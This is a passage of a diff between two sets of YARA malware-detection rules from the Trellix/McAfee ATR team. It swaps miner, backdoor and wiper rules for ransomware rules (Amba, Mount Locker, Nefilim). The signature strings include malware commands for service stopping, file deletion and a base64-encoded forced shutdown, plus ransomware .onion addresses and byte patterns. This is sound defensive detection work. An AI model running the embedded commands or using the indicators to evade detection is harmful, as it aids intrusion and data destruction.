25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 }
+		$s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 }
+		$s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 }
+		$s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 }
+		$s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ( $seq* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE
+rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Monero mining software"
-		author = "Trellix ATR team"
-		id = "98ee7711-16ee-58e1-b52f-c68dd5f2b8a3"
-		date = "2018-04-05"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/MINER_Monero.yar#L1-L43"
+		description = "Rule to detect Amba Ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "961f2892-e462-55e4-bd96-7dff895cb1e6"
+		date = "2017-07-03"
+		modified = "2020-08-14"
+		reference = "https://www.enigmasoftware.com/ambaransomware-removal/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_amba.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4c1815186b0eb9e6be5fb0fcad02fd981ac9cf79c485fe12ce4a73054ef9fda2"
+		hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f"
+		logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd"
 		score = 75
-		quality = 70
-		tags = "MINER, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "miner"
-		malware_family = "Ransom:W32/MoneroMiner"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Amba"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$1 = "* COMMANDS:     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$2 = "--cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" fullword ascii
-		$3 = "* THREADS:      %d, %s, av=%d, %sdonate=%d%%%s" fullword ascii
-		$4 = "--user-agent         set custom user-agent string for pool" fullword ascii
-		$5 = "-O, --userpass=U:P       username:password pair for mining server" fullword ascii
-		$6 = "--cpu-priority       set process priority (0 idle, 2 normal to 5 highest)" fullword ascii
-		$7 = "-p, --pass=PASSWORD      password for mining server" fullword ascii
-		$8 = "* VERSIONS:     XMRig/%s libuv/%s%s" fullword ascii
-		$9 = "-k, --keepalive          send keepalived for prevent timeout (need pool support)" fullword ascii
-		$10 = "--max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)" fullword ascii
-		$11 = "--nicehash           enable nicehash/xmrig-proxy support" fullword ascii
-		$12 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
-		$13 = "* CPU:          %s (%d) %sx64 %sAES-NI" fullword ascii
-		$14 = "-r, --retries=N          number of times to retry before switch to backup server (default: 5)" fullword ascii
-		$15 = "-B, --background         run the miner in the background" fullword ascii
-		$16 = "* API PORT:     %d" fullword ascii
-		$17 = "--api-access-token=T access token for API" fullword ascii
-		$18 = "-t, --threads=N          number of miner threads" fullword ascii
-		$19 = "--print-time=N       print hashrate report every N seconds" fullword ascii
-		$20 = "-u, --user=USERNAME      username for mining server" fullword ascii
+		$s1 = "64DCRYPT.SYS" fullword wide
+		$s2 = "32DCRYPT.SYS" fullword wide
+		$s3 = "64DCINST.EXE" fullword wide
+		$s4 = "32DCINST.EXE" fullword wide
+		$s5 = "32DCCON.EXE" fullword wide
+		$s6 = "64DCCON.EXE" fullword wide
+		$s8 = "32DCAPI.DLL" fullword wide
+		$s9 = "64DCAPI.DLL" fullword wide
+		$s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii
+		$s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii
+		$s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii
+		$s13 = "RGVmcmFnbWVudFNlcnZpY2U="
+		$s14 = "LWVuY3J5cHQgcHQ5IC1wIA=="
+		$s15 = "LWVuY3J5cHQgcHQ3IC1wIA=="
+		$s16 = "LWVuY3J5cHQgcHQ2IC1wIA=="
+		$s17 = "LWVuY3J5cHQgcHQzIC1wIA=="
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 8 of them ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 8 of them ) ) or ( all of them )
 }
-
-rule TRELLIX_ARC_Syskit : FILE
+rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE
 {
 	meta:
-		description = "SYSkit backdoor"
-		author = "Christiaan @ McAfee ATR"
-		id = "f06db38f-52d5-51b5-a17f-63e285dd5f80"
-		date = "2019-09-17"
-		modified = "2020-04-02"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Tortoiseshell_Syskit.yar#L3-L40"
+		description = "Rule to detect Mount Locker ransomware"
+		author = "McAfee ATR Team"
+		id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb"
+		date = "2020-09-25"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_mountlocker.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87"
+		logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0"
 		score = 75
-		quality = 68
-		tags = "FILE"
-		hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4"
-		hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193"
-		hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2"
+		quality = 64
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/MountLocker"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+		hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273"
+		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
 
 	strings:
-		$x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide
-		$s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
-		$s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide
-		$s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide
-		$s5 = "serviceProcessInstaller1" fullword ascii
-		$s6 = "    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide
-		$s7 = "exec_cmd2" fullword ascii
-		$s8 = "exec_cmd" fullword ascii
-		$s9 = "send_command_result" fullword ascii
-		$s10 = "mycontent" fullword ascii
-		$s11 = "Diagnostic Server Host" fullword wide
-		$s12 = "bytesToBeEncrypted" fullword ascii
-		$s13 = "createPostRequest" fullword ascii
-		$s14 = "myhash" fullword ascii
-		$s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii
-		$s16 = "circle_time" fullword ascii
-		$s17 = "ServiceStart_AfterInstall" fullword ascii
-		$s18 = "serviceInstaller1" fullword ascii
-		$s19 = "BAK.ProjectInstaller.resources" fullword ascii
-		$s20 = "Dll host" fullword wide
-		$op0 = { 96 00 f1 0a 57 02 05 00 34 25 }
-		$op1 = { 96 00 83 05 5a 01 0e 00 38 28 }
-		$op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 }
+		$s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44}
+		$s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e}
+		$s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( $s1 and $s2 ) or ( $s1 and $s3 ) or $s1
 }
-rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE
+rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect MiniASP based on PDB"
+		description = "Rule to detect Nefilim ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488"
-		date = "2012-07-12"
-		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_MiniASP_pdb.yar#L1-L26"
+		id = "55d9cb20-5071-5dce-a46f-a20816ba379f"
+		date = "2020-03-17"
+		modified = "2020-04-03"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L3-L48"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53"
-		logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055"
+		hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6"
+		logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/MiniASP"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb"
-		$pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb"
+		$s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii
+		$s2 = "oh how i did it??? bypass sofos hah" fullword ascii
+		$s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide
+		$s4 = "NEFILIM-DECRYPT.txt" fullword wide
+		$op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 }
+		$op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 }
+		$op2 = { 84 e0 40 00 90 d1 40 00 08 }
+		$bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or all of ( $op* ) or $bp
 }
-rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE
+
+rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE
 {
 	meta:
-		description = "Detecting variants of Hermetic Wiper malware discovered in UA"
-		author = " cb @ Trellix ATR"
-		id = "fc6d9238-b732-541d-b083-11b43fe8770d"
-		date = "2022-02-24"
-		modified = "2022-02-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Troj_HermWiper.yar#L1-L27"
+		description = "Rule to detect Nefilim samples digitally signed"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9"
+		date = "2020-04-02"
+		modified = "2020-08-14"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L50-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
